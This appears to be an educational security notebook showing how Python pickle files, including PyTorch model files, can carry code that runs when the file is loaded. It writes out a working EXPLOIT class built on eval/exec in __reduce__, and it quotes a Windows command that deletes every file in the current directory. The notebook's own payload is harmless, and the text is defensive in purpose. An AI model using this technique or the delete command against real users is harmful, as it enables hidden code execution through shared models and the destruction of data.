# Exploiting pickle serialization

<a href="https://colab.research.google.com/drive/1-xZDB44n_kgOaOqT3EcSPoPPsj_1BPbI" target="_blank">
  <img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab">
</a>

Return to the [castle](https://github.com/Nkluge-correa/teeny-tiny_castle).

[Python](https://www.python.org/) is one of the main programming languages used for _data science_ and _machine learning_ purposes. As such, developers using this language must be aware of the types of vulnerabilities that Python presents.

The pickle module in Python has a potential exploit as it can be used to execute arbitrary code when loading a pickled object. Pickle is a Python module used to serialize and deserialize Python objects, allowing them to be stored or transmitted as a byte stream.

However, suppose an attacker gains control of the pickled object. In that case, they may be able to inject malicious code into the object that is executed when it is loaded with the pickle module. This can be particularly dangerous when the pickled object is an ML model, i.e., something commonly downloaded and used in places like [Hugging Face](https://huggingface.co/). Although the [safe-tensors](https://huggingface.co/docs/safetensors/index) data type prevents malicious code execution, [PyTorch is also introducing](https://pytorch.org/docs/stable/generated/torch.load.html) new features for safe serialization.

![pickle](https://media3.giphy.com/media/JmPenP1svctdfDCEHi/giphy.gif)

[Source](https://giphy.com/explore/pickle-rick)

First, Let us define a malicious Python executable we want to run. However, _anything that Python can execute can be made into a payload_ (e.g., batch/shell code). For example:

```Python

import os
os.system('''for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)''')

```

This payload will delete all files and directories in the current working directory of some poor soul. But let's do something more pythonic and less evil.

In [1]:

def foo():
    """
    Creates 10 directories named "HA", "HAHA", "HAHAHA", ..., "HAHAHAHAHA" using os.mkdir.
    Opens the Github page "https://github.com/Nkluge-correa/teeny-tiny_castle"
    using webbrowser.open. Deletes the os and webbrowser modules from sys.modules.

    Returns:
        None
    """
    import os
    for i in range(1, 11):
        os.mkdir(f'{"HA" * i}')

    import webbrowser
    webbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")

    import sys
    del sys.modules["os"]
    del sys.modules["webbrowser"]


This function will create a series of directories (exactly 10) titled "HA" and open your browser to the [`Teeny Tiny Castle` 🏰](https://github.com/Nkluge-correa/teeny-tiny_castle) repository. This could be turned into something much more harmful, but you should never create malicious code to be used against others.

Let us transform this function into a string, which we will later inject into a pickle file. We can use the `inspect` module and some of its utilities for this.

In [3]:

import inspect

"""
Turns a python function into single string.

Now, something like exec(inject_src) will run this payload
(the exec function is used when you want to execute a file or program)
"""
source = inspect.getsourcelines(foo)[0]
source = source[1:]
find_indent = len(source[0]) - len(source[0].lstrip())
source = [line[find_indent:] for line in source]
inject_src = "\n".join(source)

print(inject_src)


"""

Creates 10 directories named "HA", "HAHA", "HAHAHA", ..., "HAHAHAHAHA" using os.mkdir.

Opens the Github page "https://github.com/Nkluge-correa/teeny-tiny_castle"

using webbrowser.open. Deletes the os and webbrowser modules from sys.modules.


Returns:

    None

"""

import os

for i in range(1, 11):

    os.mkdir(f'{"HA" * i}')


import webbrowser

webbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")


import sys

del sys.modules["os"]

del sys.modules["webbrowser"]



The vulnerability of the pickle module poses a risk to ML engineers and practitioners given the fact that [Pytorch](https://pytorch.org/), among other libraries (e.g., [HuggingFace](https://huggingface.co/)) [use pickle to save/load a serialized objects (models) to/from disk](https://pytorch.org/docs/master/generated/torch.load.html).

This vulnerability is made explicit in both the `pickle` module documentation:

> **[Warning](https://docs.python.org/3/library/pickle.html): The `pickle` module is not secure. Only unpickle data you trust. It is possible to construct malicious pickle data that will execute arbitrary code during unpickling. Never unpickle data that could have come from an untrusted source or that could have been tampered with.**

And in `Pytorch`:

> **[`torch.load()`](https://pytorch.org/docs/master/generated/torch.load.html#torch.load) uses the `pickle` module implicitly, which is known to be insecure. Constructing malicious pickle data to execute arbitrary code during unpickling is possible. Never load data that could have come from an untrusted source or been tampered with. Only load data you trust.**

We can inspect pickle objects with the `pickletools` as a preventive measure.


In [4]:
import pickletools
import pickle

with open('pickle', 'wb') as fp:
    pickle.dump(inject_src, fp, protocol=pickle.HIGHEST_PROTOCOL)
    fp.close()

import os
os.popen('python -mpickle pickle').read()

my_pickle = pickle.dumps(inject_src)

pickletools.dis(my_pickle)


    0: \x80 PROTO      4
    2: \x95 FRAME      503
   11: X    BINUNICODE '"""\n\nCreates 10 directories named "HA", "HAHA", "HAHAHA", ..., "HAHAHAHAHA" using os.mkdir.\n\nOpens the Github page "https://github.com/Nkluge-correa/teeny-tiny_castle"\n\nusing webbrowser.open. Deletes the os and webbrowser modules from sys.modules.\n\n\nReturns:\n\n    None\n\n"""\n\nimport os\n\nfor i in range(1, 11):\n\n    os.mkdir(f\'{"HA" * i}\')\n\n\nimport webbrowser\n\nwebbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")\n\n\nimport sys\n\ndel sys.modules["os"]\n\ndel sys.modules["webbrowser"]\n'
  512: \x94 MEMOIZE    (as 0)
  513: .    STOP
highest protocol among opcodes = 4


Here, we can see the contents of this pickle file. But a string alone cannot execute code. We need something that will _execute_ the contents of this string when a pickle file is loaded.

`Pickle` allows you to define custom behavior for the pickling process for your class instances. We would need to implement the `__reduce___ method to get code execution.

> The `__reduce__()` method takes no argument and shall return either a string or preferably a tuple (the returned object is often referred to as the "_reduce value_"). [...] When a tuple is returned, it must be between two and six items long. Optional items can either be omitted, or None can be provided as their value. The semantics of each item are in order: (1) a callable object that will be called to create the initial version of the object; (2) a tuple of arguments for the callable object; and (3) an empty tuple must be given if the callable does not accept any argument.

Thus, by implementing `__reduce__` in a class in which instances we are going to pickle, we can give the pickling process a callable plus some arguments to run. While intended for reconstructing objects, we can abuse this to get our code executed.

Here we create a class that takes as its argument a dictionary and a string (our payload), and returns a dictionary and the evaluation (`eval`) of an executing function (`exec`) that runs our payload through the `__reduce__` method.

In [5]:
class EXPLOIT(dict):
    """
    The EXPLOIT class is a subclass of dict. It initializes an
    instance with an inject_src string and any additional keyword
    arguments passed to it. The inject_src string is stored in the
    instance as _inject_src. The reduce() method is overridden to allow
    for serialization of the instance, which returns an evaluated tuple
    of the inject_src string, a new empty dictionary and the current
    instance's key-value pairs as an iterator. This class can be used
    for executing arbitrary code during serialization of an instance.
    """

    def __init__(self, inject_src: str, **kwargs):

        super().__init__(**kwargs)
        self._inject_src = inject_src

    def __reduce__(self):
        return eval, (f"exec('''{self._inject_src}''') or dict()",), None, None, iter(self.items())


Through this trickery, we can save our executable payload without activating it in the process. And when we evaluate the save object, we see that we have a code string inside an `exec` function. This function will be executed the second we load this object.

Note: _the dictionary will still be intact after this process, so you can save a useful model that works when loaded but executes some malicious code in the background after the model is loaded. Bellow, we create the simplest linear model as an example_.

In [6]:
import pickletools
my_dict = {'model': 'my_model', 'w': 1.0076, 'b': 0.1234}


with open('bad_pickle', 'wb') as fp:
    pickle.dump(EXPLOIT(inject_src, **my_dict), fp,
                protocol=pickle.HIGHEST_PROTOCOL)
    fp.close()


my_bad_pickle = pickle.dumps(EXPLOIT(inject_src, **my_dict))

pickletools.dis(my_bad_pickle)


    0: \x80 PROTO      4
    2: \x95 FRAME      596
   11: \x8c SHORT_BINUNICODE 'builtins'
   21: \x94 MEMOIZE    (as 0)
   22: \x8c SHORT_BINUNICODE 'eval'
   28: \x94 MEMOIZE    (as 1)
   29: \x93 STACK_GLOBAL
   30: \x94 MEMOIZE    (as 2)
   31: X    BINUNICODE 'exec(\'\'\'"""\n\nCreates 10 directories named "HA", "HAHA", "HAHAHA", ..., "HAHAHAHAHA" using os.mkdir.\n\nOpens the Github page "https://github.com/Nkluge-correa/teeny-tiny_castle"\n\nusing webbrowser.open. Deletes the os and webbrowser modules from sys.modules.\n\n\nReturns:\n\n    None\n\n"""\n\nimport os\n\nfor i in range(1, 11):\n\n    os.mkdir(f\'{"HA" * i}\')\n\n\nimport webbrowser\n\nwebbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")\n\n\nimport sys\n\ndel sys.modules["os"]\n\ndel sys.modules["webbrowser"]\n\'\'\') or dict()'
  554: \x94 MEMOIZE    (as 3)
  555: \x85 TUPLE1
  556: \x94 MEMOIZE    (as 4)
  557: R    REDUCE
  558: \x94 MEMOIZE    (as 5)
  559: (    MARK
  560: \x8c     SHORT_BINUNI

⚠️Warning! ONLY EXECUTE THE NEXT CELL IF YOU WANT TO EXECUTE THE PAYLOAD (THE ONE PROVIDED IN THIS ORIGINAL NOTEBOOK IS HARMLESS).⚠️


In [7]:
import plotly.graph_objects as go
import numpy as np
with open(r"bad_pickle", "rb") as fp:
    my_dict = pickle.load(fp)
    fp.close()

print(my_dict)

w0 = my_dict['w']
b0 = my_dict['b']


x = np.random.randn(200)*2
noise = np.random.normal(1, 20, 200)*0.05
y = x + noise

model_LR = np.dot(x, w0) + b0

fig = go.Figure(data=go.Scatter(
    x=x, y=y, mode='markers', name='Mystery Function'))
fig.update_layout(template='plotly_dark',
                  title='Loaded Model Still Works!',
                  paper_bgcolor='rgba(0, 0, 0, 0)',
                  plot_bgcolor='rgba(0, 0, 0, 0)')
fig.add_trace(go.Scatter(x=x, y=model_LR,
              name=f'my_model = {round(w0, 4)} * x + {round(b0, 4)}'))


fig.show()


{'model': 'my_model', 'w': 1.0076, 'b': 0.1234}


How might this affect ML engineers and practitioners in the field? Libraries like `HuggingFace` democratize ML research by sharing models for n types of tasks. However, nothing prevents an attacker from uploading a model to the platform (or code-sharing platform, e.g., `GitHub`) that contains malicious code to be executed during upload.

Below, we have created an `.pt` file (a machine learning model created using PyTorch) containing nothing but "222.222.222 zeros" and a malicious executable.

A malicious attacker could save such a model (or a totally legitimate model), send it to a public repository, make a good advertisement for his `ultimate_model_to_rule_all_models`, and hope that curiosity will lure victims into his trap.

In [8]:
import torch

junk = torch.zeros(222222222)

model = {
    "ultimate_model_to_rule_all_models": junk,
}

ultimate_model = EXPLOIT(inject_src, **model)

torch.save(ultimate_model, 'ultimate_model_to_rule_all_models.pt')


⚠️Warning! ONLY EXECUTE THE NEXT CELL IF YOU WANT TO EXECUTE THE PAYLOAD (THE ONE PROVIDED IN THIS ORIGINAL NOTEBOOK IS HARMLESS).⚠️


In [10]:
model = torch.load('ultimate_model_to_rule_all_models.pt')

print(model)


You are using `torch.load` with `weights_only=False` (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for `weights_only` will be flipped to `True`. This limits the functions that could be executed during unpickling. Arbitrary objects will no longer be allowed to be loaded via this mode unless they are explicitly allowlisted by the user via `torch.serialization.add_safe_globals`. We recommend you start setting `weights_only=True` for any use case where you don't have full control of the loaded file. Please open an issue on GitHub for any issues related to this experimental feature.



{'ultimate_model_to_rule_all_models': tensor([0., 0., 0.,  ..., 0., 0., 0.])}


The story's moral is that you should take the warnings in the `Pickle` and `Pytorch` library documentation seriously.

> [Warning](https://docs.python.org/3/library/pickle.html): The `pickle` module is not secure. Only unpickle data you trust. Constructing malicious pickle data to execute arbitrary code during unpickling is possible.

As a precaution, one possible security measure would involve only loading templates from unverified sources into virtual machines. Stay safe, folks! 🙃

---

Return to the [castle](https://github.com/Nkluge-correa/teeny-tiny_castle).
